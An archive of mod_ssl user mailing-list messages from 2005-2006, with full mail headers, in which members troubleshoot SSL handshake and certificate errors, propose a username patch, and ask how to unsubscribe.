User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 21 00:08:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8892114D86A; Fri, 21 Oct 2005 00:08:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from zproxy.gmail.com (zproxy.gmail.com [64.233.162.200])
	by master.modssl.org (Postfix) with ESMTP id F252C14D838
	for ; Fri, 21 Oct 2005 00:08:02 +0200 (CEST)
Received: by zproxy.gmail.com with SMTP id i11so222951nzi
        for ; Thu, 20 Oct 2005 15:08:01 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=VkdclYjcJ4MVCmdM0m+Nkc0ujSUw+KbomaVRIIOGXozkjhxK51l2oUDw0jRw/HN9RoRmJGOW1tQwF+oHFD3x3AGKSTmwPudS+PYYv/W0ne6lANwT5lcfGLg0Zao+VtKZgdPGuJarPHaSkCryYikElFgvrJd+dTkwSID6BbbCq9I=
Received: by 10.37.18.45 with SMTP id v45mr2315265nzi;
        Thu, 20 Oct 2005 15:08:00 -0700 (PDT)
Received: by 10.36.145.13 with HTTP; Thu, 20 Oct 2005 15:08:00 -0700 (PDT)
Message-ID: 
Date: Thu, 20 Oct 2005 18:08:00 -0400
From: Jeff Ambrosino 
To: modssl-users@modssl.org
Subject: Re: reduce handshake overhead in a reverse mod_proxy (SSL front-end + SSL back-end)
Cc: mavricknzwork@yahoo.com
In-Reply-To: <20051020153016.89462.qmail@web42409.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 <20051020153016.89462.qmail@web42409.mail.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Ambrosino 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Interesting idea...  but that would require HTTP keepalive support by
the back-end, right?  (unfortunately keepalive isn't supported by our
back-end www server...)

JB

On 10/20/05, Matt Stevenson  wrote:
> You could possibly use stunnel to set up a persistent
> ssl connection. Connecting up to a local port with
> just http (only listen on localhost). I believe the
> sessions are reused with stunnel. It's extra config
> but quick to setup.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 21 19:47:24 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8E16614D839; Sat, 21 Jan 2006 19:47:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx3.mail.ru (mx3.mail.ru [194.67.23.149])
	by master.modssl.org (Postfix) with ESMTP id 2D0A114D82C
	for ; Sat, 21 Jan 2006 19:47:23 +0100 (CET)
Received: from [195.218.186.22] (port=3750 helo=[195.218.186.22])
	by mx3.mail.ru with asmtp 
	id 1F0Nlg-0003nY-00
	for modssl-users@modssl.org; Sat, 21 Jan 2006 21:47:20 +0300
Date: Sat, 21 Jan 2006 21:43:40 +0300
From: "Andrei V. Shetuhin" 
X-Mailer: The Bat! (v2.12.00)
Organization: Mail.ru
X-Priority: 3 (Normal)
Message-ID: <1536899869.20060121214340@corp.mail.ru>
To: modssl-users@modssl.org
Subject: Some changes in mod_ssl API
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrei V. Shetuhin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello!

I think is good idea to enable common work of two these options:

SSLOptions +FakeBasicAuth
and
SSLUserName 

When we enable FakeBasicAuth option, we take username
not "user", but "/C=RU/ST=-/L=Moscow/O=example.com/OU=Example/CN=user/emailAddress=user@example.com"

This is in some cases inconveniently -- if we use, for
example, Subversion VCS and make user authentication via certificate
we take "strange" commiter's usename.

I suggest to make some changes in mod_ssl module to allow set username as
a part of Subject of the Client's X509 Certificate.

For example, if SSLUserName is set to SSL_CLIENT_S_DN_CN, faked username is "user".

Please look on these patches:

For Apache 1.3
http://reki.ru/products/mod_ssl/mod_ssl-2.8.25-1.3.34-Username-patch

and

For Apache 2
http://reki.ru/products/subversion/patch-server-ssl_engine_kernel.c

--
With best regards, Andrei.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 15:26:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 53B8914D84A; Mon, 23 Jan 2006 15:26:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from uproxy.gmail.com (uproxy.gmail.com [66.249.92.197])
	by master.modssl.org (Postfix) with ESMTP id 2490E14D829
	for ; Mon, 23 Jan 2006 15:26:38 +0100 (CET)
Received: by uproxy.gmail.com with SMTP id u40so757642ugc
        for ; Mon, 23 Jan 2006 06:26:38 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=ilpsa+KLUO6yooYA5/tcmS4WbybD/nBX17rBGU4Xvy3J3nDJfYCBeeLyr+psabjGeoFgOa8SFeVQrX+iL8tDwUhlyyrcVpqlgr70y+R0SsIaecB09vNVXnyJ4ws7xE3MAw06CpG9qSwj/EqGTBdumR83ojbwYBAT+WyGWC5HKpU=
Received: by 10.48.217.14 with SMTP id p14mr338035nfg;
        Mon, 23 Jan 2006 06:19:45 -0800 (PST)
Received: by 10.49.42.18 with HTTP; Mon, 23 Jan 2006 06:19:44 -0800 (PST)
Message-ID: <8d0b863b0601230619w264ce29dt213e1ac701269607@mail.gmail.com>
Date: Mon, 23 Jan 2006 14:19:44 +0000
From: Michael Smith 
To: modssl-users@modssl.org
Subject: Errors with firefox
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_16954_33087895.1138025984980"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_16954_33087895.1138025984980
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello there

Not sure if the underlying problem here is with mod_ssl or openssl or
something else - so apologies if this email is going to the wrong place.

I have apache compiled on solaris with sun cc with mod_ssl-2.8.25-1.3.34 an=
d
openssl-0.9.8a (I've also tried 0.9.7i).

When accessing the site using Internet Explorer I have no problems.  With
Firefox the browser reports an 'incorrect Message Authentication Code' and
the server logs report:

[Mon Jan 23 13:13:54 2006] [error] mod_ssl: SSL handshake failed (server
xxx:443, client xxx) (OpenSSL library error follows)
[Mon Jan 23 13:13:54 2006] [error] OpenSSL: error:1408F455:SSL
routines:SSL3_GET_RECORD:decryption failed or bad record mac

I do have previous builds that 'work' ... but have been unable to determine
precisely what change initiated this problem.  One possible suspect is the
Sun compiler, which was now from studio 11 and was previously from an
earlier version which I don't have access to any more.

Any suggestions much appreciated

Thanks

Michael Smith

------=_Part_16954_33087895.1138025984980
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello there

Not sure if the underlying problem here is with mod_ssl =
or openssl or something else - so apologies if this email is going to the w=
rong place.

I have apache compiled on solaris with sun cc with mod_s=
sl-
2.8.25-1.3.34 and openssl-0.9.8a (I've also tried 0.9.7i).

When acce=
ssing the site using Internet Explorer I have no problems.  With Firef=
ox the browser reports an 'incorrect Message Authentication Code' and the s=
erver logs report:


[Mon Jan 23 13:13:54 2006] [error] mod_ssl: SSL handshake failed (s=
erver xxx:443, client xxx) (OpenSSL library error follows)
[Mon Jan 23 1=
3:13:54 2006] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:=
decryption failed or bad record mac


I do have previous builds that 'work' ... but have been unable to d=
etermine precisely what change initiated this problem.  One possible s=
uspect is the Sun compiler, which was now from studio 11 and was previously=
 from an earlier version which I don't have access to any more.


Any suggestions much appreciated

Thanks

Michael Smith=






------=_Part_16954_33087895.1138025984980--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 15:32:57 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2837414D84B; Mon, 23 Jan 2006 15:32:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from aplesjustice.dom1.jhuapl.edu (APLesJustice.dom1.jhuapl.edu [128.244.198.158])
	by master.modssl.org (Postfix) with ESMTP id 9BA8714D82C
	for ; Mon, 23 Jan 2006 15:32:55 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C62029.E482DE95"
Subject: RE: Errors with firefox
Date: Mon, 23 Jan 2006 09:32:52 -0500
Message-ID: <6590499E45A50D45A2858E70FBF14BA5017E5B70@aplesjustice.dom1.jhuapl.edu>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Errors with firefox
Thread-Index: AcYgKUnRO9+aqEL5R8m4ORLhdjwsBAAACtsw
From: "Yu, Ming" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yu, Ming" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C62029.E482DE95
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I had exactly the same problem when I compile my new Apache server
(2.2.0) with mod_ssl.  To be short, I think you are using the packaged
OpenSSL.  I fixed the problem by re-compiling the OpenSSL on the system
with shared option, but first remove the pre-installed OpenSSL package.

=20

-          Ming Yu

-          Johns Hopkins University Applied Physics Lab. =20

=20

________________________________

From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Michael Smith
Sent: Monday, January 23, 2006 9:20 AM
To: modssl-users@modssl.org
Subject: Errors with firefox

=20

Hello there

Not sure if the underlying problem here is with mod_ssl or openssl or
something else - so apologies if this email is going to the wrong place.

I have apache compiled on solaris with sun cc with mod_ssl-
2.8.25-1.3.34 and openssl-0.9.8a (I've also tried 0.9.7i).

When accessing the site using Internet Explorer I have no problems.
With Firefox the browser reports an 'incorrect Message Authentication
Code' and the server logs report:=20

[Mon Jan 23 13:13:54 2006] [error] mod_ssl: SSL handshake failed (server
xxx:443, client xxx) (OpenSSL library error follows)
[Mon Jan 23 13:13:54 2006] [error] OpenSSL: error:1408F455:SSL
routines:SSL3_GET_RECORD:decryption failed or bad record mac=20

I do have previous builds that 'work' ... but have been unable to
determine precisely what change initiated this problem.  One possible
suspect is the Sun compiler, which was now from studio 11 and was
previously from an earlier version which I don't have access to any
more.=20

Any suggestions much appreciated

Thanks

Michael Smith





------_=_NextPart_001_01C62029.E482DE95
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

















I had exactly the same problem when =
I
compile my new Apache server (2.2.0) with mod_ssl.  To be short, I =
think you
are using the packaged OpenSSL.  I fixed the problem by =
re-compiling the
OpenSSL on the system with shared option, but first remove the =
pre-installed
OpenSSL package.



 



-         
Ming =
Yu



-         
Johns
Hopkins University Applied Physics Lab. =
 



 















From:
owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of Michael Smith

Sent: Monday, January 23, =
2006
9:20 AM

To: =
modssl-users@modssl.org

Subject: Errors with =
firefox






 



Hello =
there



Not sure if the underlying problem here is with mod_ssl or openssl or =
something
else - so apologies if this email is going to the wrong place.



I have apache compiled on solaris with sun cc with mod_ssl- =
2.8.25-1.3.34 and
openssl-0.9.8a (I've also tried 0.9.7i).



When accessing the site using Internet Explorer I have no =
problems.  With
Firefox the browser reports an 'incorrect Message Authentication Code' =
and the
server logs report: 



[Mon Jan 23 13:13:54 2006] [error] mod_ssl: SSL handshake failed (server
xxx:443, client xxx) (OpenSSL library error follows)

[Mon Jan 23 13:13:54 2006] [error] OpenSSL: error:1408F455:SSL
routines:SSL3_GET_RECORD:decryption failed or bad record mac 



I do have previous builds that 'work' ... but have been unable to =
determine
precisely what change initiated this problem.  One possible suspect =
is the
Sun compiler, which was now from studio 11 and was previously from an =
earlier
version which I don't have access to any more. 



Any suggestions much appreciated



Thanks



Michael Smith















------_=_NextPart_001_01C62029.E482DE95--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 15:55:35 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1C38114D84A; Mon, 23 Jan 2006 15:55:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from otbnetworks.com (www.otbhost.com [65.14.26.5])
	by master.modssl.org (Postfix) with ESMTP id 8224A14D829
	for ; Mon, 23 Jan 2006 15:55:33 +0100 (CET)
Received: from [127.0.0.1] ([10.1.2.17])
	(authenticated)
	by otbnetworks.com (8.11.6/8.11.6) with ESMTP id k0NEtT727156
	for ; Mon, 23 Jan 2006 09:55:29 -0500
Message-ID: <43D4EE66.6040301@ccidomain.com>
Date: Mon, 23 Jan 2006 09:55:34 -0500
From: Kyle 
User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Back in the ModSSL group?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kyle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, I quit this forum a while back, and today I am suddenly receiving 
e-mails again.  What's going on?  How did I get back in the group?

Can someone tell me how to opt-out again?  I no longer have any of my 
old subscription info, and opt-out instructions aren't included in the 
e-mails like other e-mail forums I use.

Thanks,
Kyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 16:06:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 096B614D84C; Mon, 23 Jan 2006 16:06:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maillnx-us112.fmr.com (maillnx-us112.fmr.com [192.223.198.27])
	by master.modssl.org (Postfix) with ESMTP id 4442114D829
	for ; Mon, 23 Jan 2006 16:06:51 +0100 (CET)
Received: from MSGMMKSM01WIN.DMN1.FMR.COM (MSGMMKSM01WIN.dmn1.fmr.com [10.33.139.32])
	by maillnx-us112.fmr.com (Switch-3.1.2/Switch-3.1.0) with SMTP id k0NF6nbA006253
	for ; Mon, 23 Jan 2006 10:06:49 -0500
Received: from MSGMMKIV01WIN.DMN1.FMR.COM (10.33.148.30)
	by MSGMMKSM01WIN.DMN1.FMR.COM (Sigaba Gateway v3.83)
	with ESMTP id 63442760; Mon, 23 Jan 2006 10:06:49 -0500
Received: from MSGMROIM02WIN.DMN1.FMR.COM ([172.26.2.195]) by MSGMMKIV01WIN.DMN1.FMR.COM with SMTP_server; Mon, 23 Jan 2006 10:06:49 -0500
Received: from MSGMMKCLL2WIN.fmr.com ([10.33.182.24]) by MSGMROIM02WIN.DMN1.FMR.COM with Microsoft SMTPSVC(5.0.2195.6713);
	 Mon, 23 Jan 2006 10:06:49 -0500
X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Back in the ModSSL group?
Date: Mon, 23 Jan 2006 10:06:49 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Back in the ModSSL group?
Thread-Index: AcYgLToAoTANIq2PQqKY132wB0H4YQAAVo/g
From: "Brown, Craig" 
To: 
X-OriginalArrivalTime: 23 Jan 2006 15:06:49.0528 (UTC) FILETIME=[A29ADB80:01C6202E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brown, Craig" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Me too. What happened?

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Kyle
Sent: Monday, January 23, 2006 9:56 AM
To: modssl-users@modssl.org
Subject: Back in the ModSSL group?


Hi, I quit this forum a while back, and today I am suddenly receiving=20
e-mails again.  What's going on?  How did I get back in the group?

Can someone tell me how to opt-out again?  I no longer have any of my=20
old subscription info, and opt-out instructions aren't included in the=20
e-mails like other e-mail forums I use.

Thanks,
Kyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 16:44:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6D3914D84B; Mon, 23 Jan 2006 16:44:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailgate1.uni-kl.de (mailgate1.uni-kl.de [131.246.120.5])
	by master.modssl.org (Postfix) with ESMTP id ACF2E14D82C
	for ; Mon, 23 Jan 2006 16:44:03 +0100 (CET)
Received: from dfki-2203.dfki.uni-kl.de (pc-210.dfki.uni-kl.de [131.246.241.70])
	by mailgate1.uni-kl.de (8.13.4/8.13.4/Debian-3) with ESMTP id k0NFi1hm001756
	for ; Mon, 23 Jan 2006 16:44:01 +0100
Received: from kl.dfki.de (isg-2201.kl.dfki.de [192.168.22.191])
	by dfki-2203.dfki.uni-kl.de (8.11.7p1+Sun/8.11.4) with ESMTP id k0NFi1S11549;
	Mon, 23 Jan 2006 16:44:01 +0100 (MET)
Message-Id: <200601231544.k0NFi1S11549@dfki-2203.dfki.uni-kl.de>
X-Mailer: exmh version 2.7.2 01/07/2005 with nmh-1.0.4
To: modssl-users@modssl.org
Cc: elsbernd@dfki-2203.dfki.uni-kl.de
Subject: RE: Errors with firefox
X-Url: http://www.dfki.uni-kl.de/~elsbernd/
X-Alternate-Address: bofh@dfki.uni-kl.de
X-Image-Url: http://www.dfki.uni-kl.de/~elsbernd/pics/Klaus.klein.gif
X-Face: $M>Bn@FmY_i=WI\TEedu:D?W-?1t#J|YJ(jfuT-@,!K=ADK?n<}T[j65V<%d/r46~0b[oXI<\;T\,vrg#=BMNs)z$I2PI5K_Qo(+k2~sC5X&(?ZX~y1qu(>^$Ey75zK@eN5@lJ39v"9_sP9UeHr$,9;KU6I$G|5[[%m"Tl[_KvBi+E?WGKU%8=LazP}`uM4$zus8.RKRz"v4>\8sk3#'h6"CK
Mime-Version: 1.0
Content-Type: multipart/signed; boundary="==_Exmh_1138031040_565P";
	 micalg=pgp-sha1; protocol="application/pgp-signature"
Content-Transfer-Encoding: 7bit
Date: Mon, 23 Jan 2006 16:44:00 +0100
From: "Klaus Elsbernd" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Klaus Elsbernd" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--==_Exmh_1138031040_565P
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

and with explorer too.

Hello out there,

Ming.Yu=40jhuapl.edu said:
>  had exactly the same problem when I compile my new Apache server (2.2.=
0)
> with mod_ssl. =A0To be short, I think you are using the packaged OpenSS=
L. =A0I
> fixed the problem by re-compiling the OpenSSL on the system with shared=

> option, but first remove the pre-installed OpenSSL package.=20
I've got the same problem. I compiled openssl-0.9.8a with Sun Forte Studi=
o 10.
doesn't matter, problem remains.

For the record. Created our own root-CA, signed it by himself,
Created server-certificate and signed it by the just created root-CA.
Loaded the root-CA into firefox/explorer and configured apache with the=20
server-certificate without errors.
firefox and explorer complain with unknown error, when initiated https-re=
quest.

On command-line, I've verified the certificate with
openssl verify -issuer_checks -CApath /var/opt/openssl /etc/opt/apache2/s=
sl.crt/server.crt

which results in
error 29 at 0 depth lookup:subject issuer mismatch

That seems the main problem.
Perhaps the creation of our root-CA/server-cert=20
process isn't correct. Or 0.9.8a isn't as tolerant as 0.9.7.
(we followed the same procedure, as with 0.9.7 a year ago.) So it's an=20
openssl-problem.

The web suggestes, that organisation-name of certificate and root-CA shou=
ld be=20
different in each/all parts of the name. But I'm a little bit unwilling t=
o=20
accept this argument, because it's unresonable to me. One difference shou=
ld be=20
sufficient. That the case in our process.

Thanks for commenting

Klaus

--=20
=22Sure, vi is user friendly.
 It's just particular about who it makes friends with.=22 ;-)=20
                                      _________________________
Klaus Elsbernd; System Administrator, BOFH        =7C elsbernd=40dfki.uni=
-kl.de
Deutsches Forschungsz. f=FCr K=FCnstliche Intelligenz =7C DFKI GmbH, Geb.=
 57/285
67657 Kaiserslautern; Germany         Fernruf: 0631/205-3486 Fernbild: -3=
457



--==_Exmh_1138031040_565P
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (SunOS)
Comment: Exmh version 2.7.2 01/07/2005

iQCVAwUBQ9T5wGrOJahe3R7NAQLG/AP7B7sPgMsFnWjbhBX7yL6F6adJh00wHaWR
XYvXDLFyOiNserm9erdhIVwRPXfMLOdUyrHJ0DSiRGFQWTHqKqSbXNM9b8bCyDOn
iOwcReQFcjQfFKIIUM2uqLCDWBB+LLceaAGZrgHxAjIQ67m0Lp/AxfxfyPn+Cnxj
+tefh0CgN0M=
=ysKT
-----END PGP SIGNATURE-----

--==_Exmh_1138031040_565P--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 17:56:27 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7380214D849; Mon, 23 Jan 2006 17:56:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relay2.es.uci.edu (relay2.es.uci.edu [128.200.80.28])
	by master.modssl.org (Postfix) with ESMTP id F16CD14D829
	for ; Mon, 23 Jan 2006 17:56:26 +0100 (CET)
Received: from [128.195.105.234] (pv105234.reshsg.uci.edu [128.195.105.234])
	(authenticated bits=0)
	by relay2.es.uci.edu (8.13.1/8.13.1) with ESMTP id k0NGuPKl013821
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 23 Jan 2006 08:56:25 -0800
X-UCInetID: jfeise
Message-ID: <43D50AB7.3040205@ics.uci.edu>
Date: Mon, 23 Jan 2006 08:56:23 -0800
From: Joachim Feise 
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051201 Thunderbird/1.5 Mnenhy/0.7.3.0
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Back in the ModSSL group?
References: <43D4EE66.6040301@ccidomain.com>
In-Reply-To: <43D4EE66.6040301@ccidomain.com>
X-Enigmail-Version: 0.94.0.0
X-Message: MS Outlook is evil.
X-Face: ".VkfaZ'q>9U9_]JOTykMM^88emlx:rG{m-5JHhsQ~\Cj43sZOq"rZTWsJG+%+R8#r_/o
 6-TIJFfgXwgkDmCFG-v/3Gkt%k3%HwA#d&j6.R,7gb?UXNP0B;\npi/_a>x"(RyBjiOw*I.;8=.l
 {N[OuH;-p8LW0>]4$OW!z`-!Iy%2^?v9r.hn6$R+,dpC_zU+}91L{x_!4PK,P7\mv)`w{h(QTE)Z
 ?(p>OgR}}e!`'4jJ`b|$?lppz@wmLaLi[
Face: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAHlBMVEUNEwyOlI2nraUABQD
 N08x9g3xRV1Ds8usABAAAAgBs7OnJAAACQ0lEQVR4nF2TMW/cMAyFBRgQkFFGlF2EjawCBBTJmIN
 ar/U10uxLYu4NXGgtkMXZOvb+bZ9k52KX8HDmd3yUyGdxXmJ+c0JUzt2t72fxAZDP4f4Ha15Ud3v
 wZlcg7CeYEb+RYoQU1f0OWCF5DCHyIHbgDfmglNJxEGsTkdPOCeRrMiqwqLbAirGvicjkkgtwzlk
 eFeUwgeX9BkhGQeMPRJrl1R6Qz0EmcvW+BcemgMMK5jkPDmCsV0CRn5cKAOv4E9zwsEo59yRkuAC
 dwZ+rs4DQ47PsN0Cg4r2AFwActksTmi/gXIB1slwj+YNSIVbz/L4AZ2XfqxpKRukdEFEdm3LzxoQ
 43P+dM7Co0ErdnMiTYkgNsMQMcMLydN1i6lST0n0cZFHBljMwRAdSeCgO1uHWIjOp86EMqcYTZSl
 RnlKB+xWAYX3P/3XlHnYDzAY4F/I6TNOWuf+wdgWVGwvwGWh+ttXSw1WVzIB822RQXQBGosu1QwZ
 DPs3afGx6HNSYQM0hAMCoVRn75AMsFeoQ6gwEjIoaJ6+T1zXmSjooEwZ4exBSfMFWU2ph3KBCBqe
 mBWBx7BJ29zUcMS1CXXzxU8xS3qfUpZ/jkbJ54epb71uGlJ9SmtIrhzx1WHdMnX/QkUUHgIhjbRQ
 h8YgXmIJFzoJ9g62Visy3eM/b/wC/8CFgrczdAnwBiFfmHp35tAfwWuSADuMxFTBdKlLLWShcF+k
 teIAO+nSlotuAV3QYVVEC+GyeklK9Uo/l57QDMLRalEr7f0PUUat8ZcMkAAAAAElFTkSuQmCC
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joachim Feise 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Kyle wrote on 01/23/06 06:55:

> Hi, I quit this forum a while back, and today I am suddenly receiving 
> e-mails again.  What's going on?  How did I get back in the group?


Ditto here.

> 
> Can someone tell me how to opt-out again?  I no longer have any of my 
> old subscription info, and opt-out instructions aren't included in the 
> e-mails like other e-mail forums I use.


It says
Automated List Manager                            majordomo@modssl.org
At the bottom of the mails. Just send an email to that address, and you get the
usual majordomo help email with unsubscribe info.
I agree, though, that this should not have happened in the first place.

-Joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 23 19:42:01 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5D05714D849; Mon, 23 Jan 2006 19:42:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-01.nyroc.rr.com (ms-smtp-01.nyroc.rr.com [24.24.2.55])
	by master.modssl.org (Postfix) with ESMTP id F3CB014D829
	for ; Mon, 23 Jan 2006 19:42:00 +0100 (CET)
Received: from kamdesigns (cpe-24-195-56-118.nycap.res.rr.com [24.195.56.118])
	by ms-smtp-01.nyroc.rr.com (8.13.4/8.13.4) with SMTP id k0NIfrCO021894
	for ; Mon, 23 Jan 2006 13:41:54 -0500 (EST)
Message-ID: <008301c6204c$acbf7670$6702a8c0@kamdesigns>
From: "Peter Reilly" 
To: 
References: <43D4EE66.6040301@ccidomain.com> <43D50AB7.3040205@ics.uci.edu>
Subject: Re: Back in the ModSSL group?
Date: Mon, 23 Jan 2006 13:41:50 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
